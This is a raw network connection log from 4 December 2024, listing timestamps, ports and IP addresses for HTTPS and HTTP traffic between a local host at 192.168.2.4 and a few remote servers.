Dec 4, 2024 12:17:07.386791945 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.386816025 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.387195110 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.387201071 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.390219927 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.390530109 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.390561104 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.390861988 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.390870094 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.678657055 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.678735971 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.678952932 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.682468891 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.682498932 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.682514906 CET	49752	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.682519913 CET	443	49752	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.685956001 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.685998917 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.686063051 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.686218977 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.686229944 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.747319937 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.747407913 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.747468948 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.747718096 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.747741938 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.747754097 CET	49753	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.747760057 CET	443	49753	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.751022100 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.751068115 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.751161098 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.751364946 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.751375914 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.754040003 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.754108906 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.754189014 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.754311085 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.754328966 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.754355907 CET	49751	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.754362106 CET	443	49751	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.757023096 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.757062912 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.757149935 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.757306099 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.757319927 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.762623072 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:07.762696981 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:07.763300896 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:07.763319969 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:07.765407085 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:07.765428066 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:07.825707912 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.825769901 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.825851917 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.826111078 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.826127052 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.826138973 CET	49755	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.826143980 CET	443	49755	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.829401016 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.829447031 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.829551935 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.829732895 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.829750061 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.830409050 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.830477953 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.830529928 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.830635071 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.830652952 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.830667019 CET	49754	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.830672026 CET	443	49754	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.832803011 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.832828045 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:07.832905054 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.833050966 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:07.833064079 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:08.639879942 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:08.639981031 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:08.640011072 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.640043974 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.640270948 CET	49756	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.640283108 CET	443	49756	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:08.641771078 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.641808033 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:08.642014027 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.642309904 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:08.642321110 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:09.467019081 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.467565060 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.467581034 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.468005896 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.468081951 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.468086958 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.468369007 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.468391895 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.468728065 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.468733072 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.473367929 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.473711967 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.473721027 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.474100113 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.474103928 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.549673080 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.550306082 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.550326109 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.550811052 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.550816059 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.609769106 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.610323906 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.610364914 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.610831022 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.610846043 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.903492928 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.903579950 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.903647900 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.903863907 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.903886080 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.903918982 CET	49758	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.903924942 CET	443	49758	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.907268047 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.907308102 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.907398939 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.907567978 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.907573938 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.909312010 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.909379959 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.909427881 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.909578085 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.909596920 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.909611940 CET	49759	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.909617901 CET	443	49759	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.910516977 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.910576105 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.910623074 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.910696983 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.910701036 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.910716057 CET	49757	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.910720110 CET	443	49757	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.912281036 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912324905 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.912410975 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912457943 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912491083 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.912534952 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912542105 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.912543058 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912734032 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.912739992 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.985187054 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.985265970 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.985323906 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.985555887 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.985569000 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.985579967 CET	49761	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.985584021 CET	443	49761	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.988732100 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.988773108 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:09.988888979 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.989058971 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:09.989069939 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.039005995 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.039129019 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.039721012 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.039727926 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.041781902 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.041788101 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.052830935 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.052886009 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.052947998 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.053200960 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.053225994 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.053241014 CET	49760	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.053246021 CET	443	49760	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.056026936 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.056067944 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.056133986 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.056289911 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:10.056302071 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:10.232042074 CET	49724	80	192.168.2.4	199.232.214.172
Dec 4, 2024 12:17:10.356090069 CET	80	49724	199.232.214.172	192.168.2.4
Dec 4, 2024 12:17:10.356204033 CET	49724	80	192.168.2.4	199.232.214.172
Dec 4, 2024 12:17:10.915117025 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.915143967 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.915208101 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.915225029 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.915251017 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.915282011 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.915483952 CET	49762	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.915503979 CET	443	49762	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.917504072 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.917546034 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:10.917622089 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.918392897 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:10.918405056 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:11.626827002 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.627479076 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.627523899 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.627959967 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.627965927 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.628791094 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.629026890 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.629040003 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.629318953 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.629323006 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.694425106 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.694856882 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.694889069 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.695460081 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.695466042 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.709634066 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.709990025 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.710007906 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.710467100 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.710472107 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.771297932 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.771709919 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.771730900 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:11.772104979 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:11.772108078 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.061492920 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.061568022 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.061624050 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.061829090 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.061856031 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.061866999 CET	49763	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.061872005 CET	443	49763	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.063201904 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.063272953 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.063322067 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.063498020 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.063517094 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.063530922 CET	49764	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.063538074 CET	443	49764	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.065735102 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.065793991 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.065861940 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.065979958 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.066026926 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.066076994 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.066133976 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.066153049 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.066222906 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.066236973 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.138206959 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.138278961 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.138329983 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.139043093 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.139066935 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.139081001 CET	49765	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.139086008 CET	443	49765	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.144354105 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.144403934 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.144424915 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.144438982 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.144474030 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.144512892 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.145452976 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.145469904 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.145479918 CET	49766	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.145484924 CET	443	49766	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.147558928 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.147603989 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.147665024 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.147753954 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.147773027 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.148858070 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.148869991 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.205998898 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.206072092 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.206126928 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.206494093 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.206509113 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.206520081 CET	49767	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.206525087 CET	443	49767	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.213454962 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.213510036 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.213574886 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.213843107 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:12.213855982 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:12.324448109 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:12.324551105 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:12.328701019 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:12.328718901 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:12.330693960 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:12.330699921 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.216293097 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.216317892 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.216366053 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.216381073 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.216391087 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.216432095 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.216783047 CET	49768	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.216799974 CET	443	49768	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.220011950 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.220046997 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.220113039 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.220607996 CET	49774	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:13.220617056 CET	443	49774	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:13.782841921 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.783066034 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.783821106 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.783869028 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.784449100 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.784456015 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.784960032 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.784993887 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.785324097 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.785329103 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.863708973 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.864207983 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.918457031 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.918998957 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.979518890 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.979557037 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.980076075 CET	49771	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.980081081 CET	443	49771	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.980432987 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.980446100 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.980835915 CET	49772	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.980839968 CET	443	49772	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.996182919 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.996592999 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.996627092 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:13.997052908 CET	49773	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:13.997059107 CET	443	49773	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.217691898 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.217793941 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.217813969 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.217844009 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.217879057 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.217916012 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.218240976 CET	49769	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.218267918 CET	443	49769	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.219244957 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.219264984 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.219278097 CET	49770	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.219284058 CET	443	49770	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.222292900 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.222335100 CET	443	49775	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:14.222407103 CET	49775	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:14.222440958 CET	49776	443	192.168.2.4	13.107.246.63
